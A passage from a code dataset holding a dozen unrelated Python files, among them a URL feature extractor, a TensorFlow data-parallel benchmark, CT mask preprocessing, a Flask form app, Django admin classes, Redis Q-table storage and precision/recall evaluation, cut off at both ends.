line.find('#')\n    if end_params == -1:\n        end_params = len(line) - 1\n\n    for param_sub in re.split('&', line[start_params:end_params]):\n        names.append(re.split('=', param_sub))\n\n    return names\n\ndef get_extension(segment):\n    ext_begin = segment.rfind('.')\n    if ext_begin == -1:\n        return \"\"\n    return segment[ext_begin + 1: len(segment)]\n\n# reads files with INPUT FILES and writes features with frequency into OUTPUT FILE\ndef extract_features(INPUT_FILE_1, INPUT_FILE_2, OUTPUT_FILE):\n    examined = open(INPUT_FILE_1, \"r\")\n    general = open(INPUT_FILE_2, \"r\")\n    result = open(OUTPUT_FILE, \"w\")\n\n    sample_size = 1000\n    min_count = 100\n\n    examined_lines = random.sample(examined.read().split('\\n'), sample_size)\n    general_lines = random.sample(general.read().split('\\n'), sample_size)\n\n    features = extract_features_from_list(examined_lines, general_lines)\n\n    for key, value in features:\n        if value < min_count:\n            break\n        result.write(key + '\\t' + str(value) + '\\n')\n\n\n# returns sorted Counter dictionary with features\ndef extract_features_from_list(QLINK_LIST, UNKNOWN_URLS_LIST):\n
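    # Both URL samples are pooled; every URL contributes its extracted feature strings to one shared Counter.\n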
    lines = []\n    features = Counter()\n\n    examined_lines = QLINK_LIST\n    general_lines = UNKNOWN_URLS_LIST\n    lines.extend(examined_lines)\n    lines.extend(general_lines)\n\n    for line in lines:\n        if line.find('\\n') != -1:\n            line = line[0:len(line) - 1]\n        features_from_url = extract_features_from_url(line)\n        if (features_from_url):\n            for feature in features_from_url:\n                features[feature] += 1\n        else:\n            print(line)\n    features = features.most_common()\n\n    print(features)\n    return features\n\n\n# extracts features from one url\ndef extract_features_from_url(url):\n    features = []\n\n    # feature 1\n    features.append(\"segments:\" + str(count_segments(url)))\n    # feature 2\n    for name in extract_param_names(url):\n        features.append(\"param_name:\" + name)\n    # feature 3\n    for param in extract_params(url):\n        if len(param) == 1:\n            param.append(\"\")\n        features.append(\"param:\" + param[0] + \"=\" + param[1])\n    # features 4a - 4f\n    #print(features)\n    segments = extract_segments(url)\n    #if not segments:\n    #\treturn features\n    for pos, segment in enumerate(segments):\n        segment_decoded = urllib.parse.unquote(segment)\n        regex_res = re.findall(\"[^\\\\d]+\\\\d+[^\\\\d]+$\", segment_decoded)\n        # feature 4a\n        features.append(\"segment_name_\" + str(pos) + \":\" + segment)\n        # feature 4b\n        if segment.isdigit():\n            features.append(\"segment_[0-9]_\" + str(pos) + \":1\")\n        # feature 4c\n        if len(regex_res) == 1 and regex_res[0] == segment_decoded:\n            features.append(\"segment_substr[0-9]_\" + str(pos) + \":1\")\n        # feature 4d\n        extension = get_extension(segment)\n        if len(extension) != 0:\n            features.append(\"segment_ext_\" + str(pos) + \":\" + extension)\n        # feature 4e\n        if len(regex_res) == 1 and regex_res[0] == segment_decoded and len(extension) != 0:\n            features.append(\"segment_ext_substr[0-9]_\" + str(pos) + \":\" + extension)\n        # feature 4f\n        features.append(\"segment_len_\" + str(pos) + \":\" + str(len(segment)))\n    return features\n","sub_path":"2_Semester/InfoSearch/Sekitei/HA_1/ef.py","file_name":"ef.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"437714733","text":"import tensorflow as tf\n\nFLAGS = tf.app.flags.FLAGS\n\ndef fake_data(batch_size, num_classes):\n    batch_size = int(batch_size / FLAGS.num_workers)\n    data = tf.Variable(\n        tf.random_normal(\n            [batch_size, FLAGS.weight_size],\n            dtype=tf.float32,\n            stddev=1e-1), name='data', trainable=False)\n    labels = tf.Variable(\n        tf.zeros([batch_size, num_classes]), trainable=False)\n    return data, labels\n\n\ndef initialize_weights():\n    weights = []\n    for i in range(FLAGS.level):\n        weights.append(\n            tf.Variable(\n                tf.zeros([FLAGS.weight_size, FLAGS.weight_size])))\n    weights.append(\n        tf.Variable(\n            tf.zeros([FLAGS.weight_size, 1])))\n    return weights\n\n\ndef network(inputs, weights, labels):\n    targets = []\n    g = tf.get_default_graph()\n\n    bp_sources = [[] for i in range(FLAGS.num_workers + 1)]\n    losses = []\n    logits = []\n\n    # FF\n    for j in range(FLAGS.num_workers):\n        with tf.device('/gpu:%d' % j):\n            x = inputs[j]\n            for i in range(FLAGS.level):\n                bp_sources[j].append(x)\n                x = tf.matmul(x, weights[j][i])\n            bp_sources[j].append(x)\n            logit = tf.matmul(x, weights[j][-1])\n            loss = (logit - labels[j]) * (logit - labels[j])\n            losses.append(loss)\n            logits.append(logit)\n\n    # return losses\n    # BP\n    dxs = []\n    temp_dxs = []\n    for j in range(FLAGS.num_workers):\n        with tf.device('/gpu:%d' % j):\n            dx = 2 * (logits[j] - labels[j])\n            dxs.append(dx)\n\n    for i in reversed(range(FLAGS.level + 1)):\n        dws = []\n
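        # Each worker computes its local weight gradient; the branches below average the gradients across workers before updating.\n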
        for j in range(FLAGS.num_workers):\n            with tf.device('/gpu:%d' % j):\n                dw = tf.matmul(tf.transpose(bp_sources[j][i]), dxs[j])\n                if i == FLAGS.level:\n                    dws.append(dw)\n                else:\n                    dws.append(tf.split(1, FLAGS.num_workers, dw))\n                dx = tf.matmul(dxs[j], tf.transpose(weights[j][i]))\n                temp_dxs.append(dx)\n        \n        dxs = temp_dxs\n        temp_dxs = []\n\n        # Update weights\n        # Reduce\n        if i == FLAGS.level:\n            for j in range(FLAGS.num_workers):\n                with tf.device('/gpu:%d' % j):\n                    dw = sum(dws) / FLAGS.num_workers\n                    targets.append(tf.assign(weights[j][i], weights[j][i] - dw))\n        else:\n            partial_dws = []\n            for j in range(FLAGS.num_workers):\n                with tf.device('/gpu:%d' % j):\n                    partial_dw = dws[0][j]\n                    for dw in dws[1:]:\n                        partial_dw += dw[j]\n                    partial_dw /= FLAGS.num_workers\n                    partial_dws.append(partial_dw)\n\n            # Aggregrate\n            for j in range(FLAGS.num_workers):\n                with tf.device('/gpu:%d' % j):\n                    dw = tf.concat(1, partial_dws)\n                    targets.append(tf.assign(weights[j][i], weights[j][i] - dw))\n\n    # return targets\n    with g.control_dependencies(targets):\n        final = tf.no_op()\n    return final \n\n\ndef get_run_op():\n    assert FLAGS.num_workers == 2\n    datum = []\n    labels = []\n    weights = []\n    for i in range(FLAGS.num_workers):\n        with tf.device('/gpu:%d' % i):\n            data, label = fake_data(FLAGS.batch_size, 1)\n            datum.append(data)\n            labels.append(label)\n            weights.append(initialize_weights())\n    gradient_targets = network(datum, weights, labels)\n    return gradient_targets\n","sub_path":"benchmark/mini/models/fc_data_manual.py","file_name":"fc_data_manual.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"2441358","text":"\"\"\"\n[Exhaustive search / recursion]\nSW mock test problem\n\"\"\"\n\ndef f(s, idx, plus, minus, mul, div):\n    global minV, maxV\n    if idx >= N:\n        minV = s if s < minV else minV\n        maxV = s if s > maxV else maxV\n    else:\n        if plus: f(s+M[idx], idx+1, plus-1, minus, mul, div)\n        if minus: f(s-M[idx], idx+1, plus, minus-1, mul, div)\n        if mul: f(s*M[idx], idx+1, plus, minus, mul-1, div)\n        if div: f(int(s/M[idx]), idx+1, plus, minus, mul, div-1)\n\nN = int(input())\nM = list(map(int, input().split()))\nC = list(map(int, input().split()))\nminV = 987654321\nmaxV = -987654321\n\nf(M[0], 1, C[0], C[1], C[2], C[3])\n\nprint(maxV)\nprint(minV)","sub_path":"TaeJuneJoung/ACM/brute_force/p14888.연산자 끼워넣기.py","file_name":"p14888.연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"36237374","text":"import glob\nimport gzip\nimport numpy as np\nimport os\nimport pandas as pd\nfrom os.path import join, isdir\n\n# use the meta name to put things in a certain folder\nbase = \"/azure-ml/mvinterns/deepmind-headneck-0/ct/\"\n\nimage_dataname = \"image*\"\n\nraw_data_folder = \"raw_dataset\"\n\n# get all files with pattern\nimage_files = glob.glob(join(base, image_dataname))\n\n# for each file\nimg_data = pd.DataFrame(\n    columns=['img', 'Bone_Mandible', 'SpinalCanal', 'Glnd_Lacrimal_L', 'Lung_R', 'Glnd_Submand_R', 'Glnd_Lacrimal_R',\n             'Cochlea_L', 'OpticNrv_cnv_R', 'Lens_R', 'SpinalCord', 'Parotid_R', 'Glnd_Submand_L', 'Brainstem',\n             'OpticNrv_cnv_L', 'Cochlea_R', 'Eye_R', 'Lens_L', 'Lung_L', 'Brain', 'Eye_L', 'Parotid_L'])\ncount = 0\nfor image_file in image_files:\n\n    try:\n        pid_scanid = image_file.split('/')[-1][6:-4]\n\n        print(pid_scanid)\n        pid = pid_scanid.split('.')[0]\n        scanid = pid_scanid.split('-')[-1].split('_')[0]\n\n        meta_dataname = join(base, \"meta_\" + pid_scanid + \".pkz\")\n
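        # The .pkz files appear to be gzip-compressed pickles (an assumption; hence gzip.open below).\n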
\".pkz\")\n image = np.load(image_file, allow_pickle=True)[\"arr_0\"]\n meta_data = np.load(gzip.open(meta_dataname, 'rb'), allow_pickle=True)\n\n masksname = join(base, \"masks_\" + pid_scanid + \"/\")\n masks = []\n\n for filename in os.listdir(masksname):\n f = join(masksname, filename)\n\n # checking if it is a file\n mask = np.load(gzip.open(f, 'rb'), allow_pickle=True)\n masks.append(mask)\n except Exception as e:\n print(e)\n continue\n\n if not masks:\n continue\n\n shape = meta_data['shape'] # scan shape\n spacing = (meta_data['ND_SliceSpacing'], meta_data['PixelSpacing'][1], meta_data['PixelSpacing'][0])\n\n for mask_data in masks:\n print('Saving ' + mask_data['name'])\n shape = mask_data['shape'] # shape of scan\n bbox = mask_data['bbox']\n cropped_mask = mask_data['roi']\n body_part_name = mask_data['name']\n \n x = image.shape[0]\n body_part_folder = join(raw_data_folder, body_part_name)\n if cropped_mask is None:\n print('roi is none')\n for i in range(x):\n img_name = join(body_part_folder, 'img', pid, scanid, pid_scanid + \"_\" + str(i) + \".png\")\n img_data.loc[count, 'img'] = img_name\n img_data.loc[count, body_part_name] = -1\n count += 1\n continue\n\n mask = np.zeros(shape, dtype=np.bool)\n try:\n b = [bbox[i] for i in [0, 3, 1, 4, 2, 5]] # get it in (z_min, z_max, y_min, y_max, x_min, x_max)\n mask[b[0]: b[1], b[2]: b[3], b[4]: b[5]] = cropped_mask\n z_min = bbox[0]\n z_max = bbox[3]\n\n mask_rgb = (mask[:, :, :] * 255).astype(np.uint8)\n pid_scanid_folder = join(body_part_folder, \"img\", pid, scanid)\n if not isdir(pid_scanid_folder):\n os.makedirs(join(body_part_folder, \"img\", pid, scanid))\n os.makedirs(join(body_part_folder, \"labelcol\", pid, scanid))\n\n # img_data.\n\n for i in range(x):\n img_name = join(body_part_folder, 'img', pid, scanid, pid_scanid + \"_\" + str(i) + \".png\")\n img_data.loc[count, 'img'] = img_name\n if i < z_min or i > z_max:\n img_data.loc[count, body_part_name] = -1\n else:\n img_data.loc[count, body_part_name] = 1\n count += 1\n except Exception as e:\n print(e)\n continue\n\n print()\n\nimg_data = img_data.fillna(0)\nimg_data.to_csv('img_data.csv')\n","sub_path":"load_data_for_classification.py","file_name":"load_data_for_classification.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176678609","text":"import unittest\nimport queue\n\nclass QueueTwoStacks(object):\n\n # Implement the enqueue and dequeue methods\n s1 = queue.LifoQueue()\n s2 = queue.LifoQueue()\n\n def enqueue(self, item):\n self.s1.put(item)\n\n def dequeue(self):\n if(self.s1.qsize()==0):\n raise Exception(\"queue empty\")\n else:\n while(self.s1.qsize()>1):\n self.s2.put(self.s1.get())\n temp = self.s1.get()\n while(self.s2.qsize()>0):\n self.s1.put(self.s2.get())\n return temp\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_queue_usage(self):\n queue = QueueTwoStacks()\n\n queue.enqueue(1)\n queue.enqueue(2)\n queue.enqueue(3)\n\n actual = queue.dequeue()\n expected = 1\n self.assertEqual(actual, expected)\n\n actual = queue.dequeue()\n expected = 2\n self.assertEqual(actual, expected)\n\n queue.enqueue(4)\n\n actual = queue.dequeue()\n expected = 3\n self.assertEqual(actual, expected)\n\n actual = queue.dequeue()\n expected = 4\n self.assertEqual(actual, expected)\n\n with self.assertRaises(Exception):\n 
queue.dequeue()\n\n","sub_path":"Week-1/Day-6/queueTwoStacks.py","file_name":"queueTwoStacks.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409519696","text":"from django.contrib import admin\nfrom plugin.admin import my_admin_site\n\nfrom .models import (\n Equipment, \n EquipmentType,\n EquipmentInspection,\n SprayPumpRoomInspection,\n SprayWarehouseInspection,\n )\n\nfrom .forms import (\n EquipmentInspectionForm,\n)\n\n# Register your models here.\nclass EquipmentTypeAdmin(admin.ModelAdmin):\n list_display = [\"name\"]\n list_editable = [\"name\"]\n list_filter = [ \"name\"]\n\n view_on_site = False\n\n class Meta:\n model = EquipmentType\n\nclass EquipmentAdmin(admin.ModelAdmin):\n list_display = [\"name\",\"type\"]\n list_editable = [ \"type\"]\n list_filter = [ \"type\"]\n\n view_on_site = False\n\n class Meta:\n model = Equipment\n\nclass EquipmentInspectionAdmin(admin.ModelAdmin):\n list_display = [\"equipment\",\"use_condition\",\"inspector\",\"check_date\",\"updated\",\"owner\",\"due_date\",\"completed_time\"]\n list_editable = [\"use_condition\",\"owner\",\"due_date\"]\n list_filter = [\"equipment\",\"use_condition\",\"inspector\",\"check_date\"]\n form = EquipmentInspectionForm\n\n view_on_site = False\n\n class Meta:\n model = EquipmentInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\n\nclass SprayPumpRoomInspectionAdmin(admin.ModelAdmin):\n list_display = ['year','month',\n \"voltage_and_power_normal\",\n \"indicator_and_instrument_normal\",\n \"switch_contactor_and_connection_normal\",\n \"no_corrosion_inside_and_foundation_bolt_not_loose\",\n \"motor_and_pump_connection_intact\",\n \"motor_sample_integrated\",\n \"no_corrosion_and_damage\",\n \"valve_normally_open\",\n \"one_way_valve_intact_and_no_leak_and_pressure_gage_normal\",\n \"pressure_maintaining_valve_intact\",\n \"water_level_normal_and_moisturizing_well\",\n \"water_level_cover_plate_and_no_abnormal_move\",\n \"pool_wall_dry_and_no_leak\",\n \"no_sundries_in_pump_house\",\n \"pump_house_clean_and_tidy\",\n ]\n list_editable = [\"voltage_and_power_normal\",\n \"indicator_and_instrument_normal\",\n \"switch_contactor_and_connection_normal\",\n \"no_corrosion_inside_and_foundation_bolt_not_loose\",\n \"motor_and_pump_connection_intact\",\n \"motor_sample_integrated\",\n \"no_corrosion_and_damage\",\n \"valve_normally_open\",\n \"one_way_valve_intact_and_no_leak_and_pressure_gage_normal\",\n \"pressure_maintaining_valve_intact\",\n \"water_level_normal_and_moisturizing_well\",\n \"water_level_cover_plate_and_no_abnormal_move\",\n \"pool_wall_dry_and_no_leak\",\n \"no_sundries_in_pump_house\",\n \"pump_house_clean_and_tidy\",]\n \n list_filter = ['year','month',]\n\n view_on_site = False\n\n class Meta:\n model = SprayPumpRoomInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\nclass SprayWarehouseInspectionAdmin(admin.ModelAdmin):\n list_display = ['year','month',\n \"valve_normal\",\n \"valve_open_signal_transmission_normal\",\n \"valve_no_corrosion\",\n \"water_testing_normal\",\n \"valve_switch_in_close_status\",\n \"pipe_network_pressure_normal\",\n \"pipe_valve_in_open_status\",\n \"pipe_connection_no_leakage\",\n \"spray_head_no_leakage\",\n \"inspector\",\n \"check_date\",\n ]\n list_editable = [\n 
\"valve_normal\",\n \"valve_open_signal_transmission_normal\",\n \"valve_no_corrosion\",\n \"water_testing_normal\",\n \"valve_switch_in_close_status\",\n \"pipe_network_pressure_normal\",\n \"pipe_valve_in_open_status\",\n \"pipe_connection_no_leakage\",\n \"spray_head_no_leakage\",\n ]\n \n list_filter = ['year','month',]\n\n view_on_site = False\n\n class Meta:\n model = SprayWarehouseInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\nadmin.site.register(Equipment, EquipmentAdmin)\nadmin.site.register(EquipmentType, EquipmentTypeAdmin)\nadmin.site.register(EquipmentInspection, EquipmentInspectionAdmin)\nadmin.site.register(SprayPumpRoomInspection, SprayPumpRoomInspectionAdmin)\nadmin.site.register(SprayWarehouseInspection, SprayWarehouseInspectionAdmin)\n\nmy_admin_site.register(Equipment, EquipmentAdmin)\nmy_admin_site.register(EquipmentType, EquipmentTypeAdmin)\nmy_admin_site.register(EquipmentInspection, EquipmentInspectionAdmin) \nmy_admin_site.register(SprayPumpRoomInspection, SprayPumpRoomInspectionAdmin) \nmy_admin_site.register(SprayWarehouseInspection, SprayWarehouseInspectionAdmin)","sub_path":"equipments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293745032","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom server import app, user_input\nimport csv\nfrom csv_fun import *\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n zID = int(request.form[\"zID\"])\n description = request.form[\"desc\"]\n user_input.append([name, zID, description])\n #with open('example','a') as csv_out:\n #writer = csv.writer(csv_out)\n #writer.writerow([name, zID, description])\n write_to_csv(\"example.csv\",[name, zID, description])\n \n return redirect(url_for(\"hello\"))\n return render_template(\"index.html\")\n\n@app.route(\"/Hello\")\ndef hello():\n user_list = print_from_csv(\"example.csv\")\n \n return render_template(\"hello.html\", all_users=user_list) \n","sub_path":"lab04/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394505558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 14 19:02:55 2017\n\n@author: absol\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndata = pd.read_csv('Salary_Data.csv')\n\nX = data.iloc[:, 0].values\nY = data.iloc[:, 1].values\nX = X.reshape((30,1))\nY = Y.reshape((30,1))\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/3, random_state = 0)\n\n#No feature scaling required because library(linear_model) takes care of it\n#Simple Linear Regression\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor = regressor.fit(X_train, Y_train)\n\n#Predicting using the trained model\ny_pred = regressor.predict(X_test)\n\n#Plotting the actual vs. predicted data\nplt.scatter(X_test, Y_test, color = 'blue')\nplt.scatter(X_test, y_pred, color = 'red')\nplt.title('actual(blue) vs. 
predicted(red) data')\nplt.xlabel('Years of experience')\nplt.ylabel('Salary')\n\n# Plotting the regression line on the training dataset\nplt.scatter(X_train, Y_train, color = 'blue')\nplt.plot(X_train, regressor.predict(X_train), color = 'red')\nplt.title('Regression line')\n\n#Plotting the actual values which should have been plotted against the regression line\nplt.scatter(X_test, Y_test, color = 'blue')\nplt.plot(X_train, regressor.predict(X_train), color = 'red')\nplt.title('Actual values against regression line')\n\n#Overall a good model","sub_path":"Machine-Learning-with-Python-R/Simple Linear Regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315152177","text":"import redis\nimport numpy as np\n\nhost = '127.0.0.1'\nport = 6379\npassword = None\n\n\nclass MyRedis:\n def __init__(self, scope):\n self.my_redis = redis.StrictRedis(host=host, port=port, db=0, password=password)\n self.scope = scope\n self.store_batch = 100000\n\n def store_td(self, saved_obj):\n my_dicts = saved_obj['q']\n step = saved_obj['step']\n\n self.my_redis.set(self.scope + ':step', step)\n\n i = 0\n tmp = dict()\n for item in my_dicts.items():\n tmp[item[0]] = '_'.join(['{:0.3f}'.format(value) for value in item[1]])\n i = i + 1\n if i % self.store_batch == 0:\n self.my_redis.hmset(self.scope + ':q', tmp)\n tmp = dict()\n if len(tmp) > 0:\n self.my_redis.hmset(self.scope + ':q', tmp)\n\n def restore_td(self):\n has_step = self.my_redis.exists(self.scope + ':step')\n has_q_dicts = self.my_redis.exists(self.scope + ':q')\n if not has_step or not has_q_dicts:\n return None\n\n restore_dicts = dict()\n restore_dicts['step'] = int(self.my_redis.get(self.scope + ':step').decode('utf-8'))\n q_dicts = self.my_redis.hgetall(self.scope + ':q')\n\n temp_dicts = dict()\n for pair in q_dicts.items():\n temp_dicts[pair[0].decode('utf-8')] = np.array([float(item) for item in pair[1].decode('utf-8').split('_')])\n restore_dicts['q'] = temp_dicts\n\n return restore_dicts\n\n def hlen_q(self):\n name = self.scope + ':q'\n value = self.my_redis.hlen(name)\n\n return value\n\n def hget_q(self, key):\n name = self.scope + ':q'\n value = self.my_redis.hget(name, key)\n\n if value is None:\n return np.zeros(4)\n return np.array([float(item) for item in value.decode('utf-8').split('_')])\n\n def hset_q(self, key, value):\n name = self.scope + ':q'\n self.my_redis.hset(name, key, '_'.join(['{:0.3f}'.format(value) for value in value]))\n\n def get_step(self):\n value = self.my_redis.get(self.scope + ':step').decode('utf-8')\n\n if value is None:\n return -1\n\n return int(value)\n\n def set_step(self, value):\n self.my_redis.set(self.scope + ':step', value)\n","sub_path":"my_redis/my_redis.py","file_name":"my_redis.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"194184155","text":"\nimport argparse\nimport ctypes\nimport glob\nimport os\nimport re\nimport sys\nfrom multiprocessing import Array\nfrom multiprocessing import Process\nfrom multiprocessing import Queue\nfrom os.path import basename\nfrom os.path import exists\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport six\n\nimport cv2 as cv\nfrom utils.evaluation import relax_precision\nfrom utils.evaluation import relax_recall\n\nif 'linux' in sys.platform:\n import matplotlib\n matplotlib.use('Agg')\n\ndef 
get_pre_rec(positive, prec_tp, true, recall_tp, steps):\n pre_rec = []\n breakeven = []\n for t in six.moves.range(steps):\n if positive[t] < prec_tp[t] or true[t] < recall_tp[t]:\n sys.exit('calculation is wrong')\n pre = float(prec_tp[t]) / positive[t] if positive[t] > 0 else 0\n rec = float(recall_tp[t]) / true[t] if true[t] > 0 else 0\n pre_rec.append([pre, rec])\n if pre != 1 and rec != 1 and pre > 0 and rec > 0:\n breakeven.append([pre, rec])\n pre_rec = np.asarray(pre_rec)\n breakeven = np.asarray(breakeven)\n breakeven_pt = np.abs(breakeven[:, 0] - breakeven[:, 1]).argmin()\n breakeven_pt = breakeven[breakeven_pt]\n\n return pre_rec, breakeven_pt\n\n\ndef draw_pre_rec_curve(pre_rec, breakeven_pt):\n plt.clf()\n plt.plot(pre_rec[:, 0], pre_rec[:, 1])\n plt.plot(breakeven_pt[0], breakeven_pt[1],\n 'x', label='breakeven recall: {}'.format(breakeven_pt[1]))\n plt.ylabel('recall')\n plt.xlabel('precision')\n plt.ylim([0.0, 1.1])\n plt.xlim([0.0, 1.1])\n plt.legend(loc='lower left')\n plt.grid(linestyle='--')\n\n\ndef worker_thread(result_fn_queue, eval_dir, label_dir, pad, offset, channel, steps, relax, all_positive, all_prec_tp, all_true, all_recall_tp):\n while True:\n i, result_fn = result_fn_queue.get()\n if result_fn is None:\n break\n\n img_id = basename(result_fn).split('pred_')[-1]\n img_id, _ = os.path.splitext(img_id)\n if '.' in img_id:\n img_id = img_id.split('.')[0]\n if len(re.findall('_', img_id)) > 1:\n img_id = '_'.join(img_id.split('_')[1:])\n out_dir = '{}{}'.format(eval_dir, img_id)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n print(img_id)\n\n label = cv.imread('{}{}.tif'.format(label_dir, img_id), cv.IMREAD_GRAYSCALE)\n pred = np.load(result_fn)\n label = label[pad + offset - 1:\n pad + offset - 1 + pred.shape[0],\n pad + offset - 1:\n pad + offset - 1 + pred.shape[1]]\n cv.imwrite('{}/label_{}.png'.format(out_dir, img_id), label * 125)\n\n print('pred_shape: {}'.format(pred.shape))\n\n for c in six.moves.range(channel):\n for t in six.moves.range(0, steps):\n threshold = 1.0 / steps * t\n\n pred_vals = np.array(\n pred[:, :, c] >= threshold, dtype=np.int32)\n\n label_vals = np.array(label, dtype=np.int32)\n if channel > 1:\n label_vals = np.array(label == c, dtype=np.int32)\n\n all_positive[i, c, t] = np.sum(pred_vals)\n all_prec_tp[i, c, t] = relax_precision(\n pred_vals, label_vals, relax)\n\n all_true[i, c, t] = np.sum(label_vals)\n all_recall_tp[i, c, t] = relax_recall(\n pred_vals, label_vals, relax)\n\n pre_rec, breakeven_pt = get_pre_rec(\n all_positive[i, c], all_prec_tp[i, c],\n all_true[i, c], all_recall_tp[i, c], steps)\n\n draw_pre_rec_curve(pre_rec, breakeven_pt)\n plt.savefig('{}/pr_curve_{}.png'.format(out_dir, c))\n np.save('{}/pre_rec_{}'.format(out_dir, c), pre_rec)\n cv.imwrite('{}/pred_{}.png'.format(out_dir, c), pred[:, :, c] * 255)\n\n print(img_id, c, breakeven_pt)\n print('thread finished')\n\n\ndef evaluate(n_process, label_dir, result_dir, epoch, pad, offset, channel, steps, relax):\n \n prediction_dir = '{}prediction_{}'.format(result_dir, epoch)\n prediction_fns = sorted(glob.glob('{}*.npy'.format(prediction_dir)))\n n_prediction = len(prediction_fns)\n eval_dir = '{}/evaluation/'.format(prediction_dir)\n\n all_positive_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_positive = np.ctypeslib.as_array(all_positive_base.get_obj())\n all_positive = all_positive.reshape((n_prediction, channel, steps))\n\n all_prec_tp_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_prec_tp = 
np.ctypeslib.as_array(all_prec_tp_base.get_obj())\n all_prec_tp = all_prec_tp.reshape((n_prediction, channel, steps))\n\n all_true_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_true = np.ctypeslib.as_array(all_true_base.get_obj())\n all_true = all_true.reshape((n_prediction, channel, steps))\n\n all_recall_tp_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_recall_tp = np.ctypeslib.as_array(all_recall_tp_base.get_obj())\n all_recall_tp = all_recall_tp.reshape((n_prediction, channel, steps))\n result_fn_queue = Queue()\n workers = [Process(target=worker_thread,\n args=(result_fn_queue, eval_dir, label_dir, pad, offset, channel, steps, relax, all_positive, all_prec_tp, all_true, all_recall_tp)) for i in range(n_process)]\n for w in workers:\n w.start()\n [result_fn_queue.put((i, fn)) for i, fn in enumerate(prediction_fns)]\n [result_fn_queue.put((None, None)) for _ in range(n_process)]\n for w in workers:\n w.join()\n print('all finished')\n\n all_positive = np.sum(all_positive, axis=0)\n all_prec_tp = np.sum(all_prec_tp, axis=0)\n all_true = np.sum(all_true, axis=0)\n all_recall_tp = np.sum(all_recall_tp, axis=0)\n for c in six.moves.range(channel):\n pre_rec, breakeven_pt = get_pre_rec(\n all_positive[c], all_prec_tp[c],\n all_true[c], all_recall_tp[c], steps)\n draw_pre_rec_curve(pre_rec, breakeven_pt)\n plt.savefig('{}/pr_curve_{}.png'.format(eval_dir, c))\n np.save('{}/pre_rec_{}'.format(eval_dir, c), pre_rec)\n\n print(breakeven_pt)\n","sub_path":"script/evaluate3.py","file_name":"evaluate3.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488268460","text":"from utils import *\nfrom todo import svd_compress\nimport os\n\ndef main():\n print(\"images in folder\")\n for imgf in os.listdir(\"imgs\"):\n img_path = os.path.join(\"imgs\",imgf)\n print(\"\\t\",img_path)\n img_path = 'imgs/Figure1.png'\n print(\"Loading\",img_path)\n imArr = load_image(img_path)\n print(\"imArr size\",imArr.shape)\n #ks = [37]\n ks = [1,5, 50, 150, 400, 600, 800, 1050, 1200]\n err = []\n for k in ks:\n print(\"Perform SVD for k=%d ...\" % k)\n imArr_compressed = svd_compress(imArr, K=k)\n err += [approx_error(imArr, imArr_compressed)]\n save_image(imArr_compressed, 'result_{}.png'.format(k))\n print(\"err\",err[-1])\n plot_curve(ks, err, show=False)\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255378290","text":"# some metric measurement for DR methods\n\nimport numpy as np\nfrom numpy.linalg import norm\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.stats import pearsonr\nfrom sklearn.preprocessing import scale\nfrom sklearn.isotonic import IsotonicRegression\n\nMACHINE_EPSILON = np.finfo(np.double).eps\n\n\nclass DRMetric(object):\n \"\"\" Metric measurements for DR methods\n \"\"\"\n\n def __init__(self, X, Y):\n \"\"\" Create Metric object\n Args:\n X (ndarray): input data in high dimensional space\n Y (ndarray): embedded result in low dimensional space\n \"\"\"\n super(DRMetric, self).__init__()\n\n # pre-calculate pairwise distance in high-dim and low-dim\n self.dX = pdist(X, \"euclidean\")\n self.dY = pdist(Y, \"euclidean\")\n\n def _qnx(self, a, b):\n \"\"\"Vectorized version of `self._Qnx` for all values of `k`\n \"\"\"\n n = len(a)\n common = set()\n res 
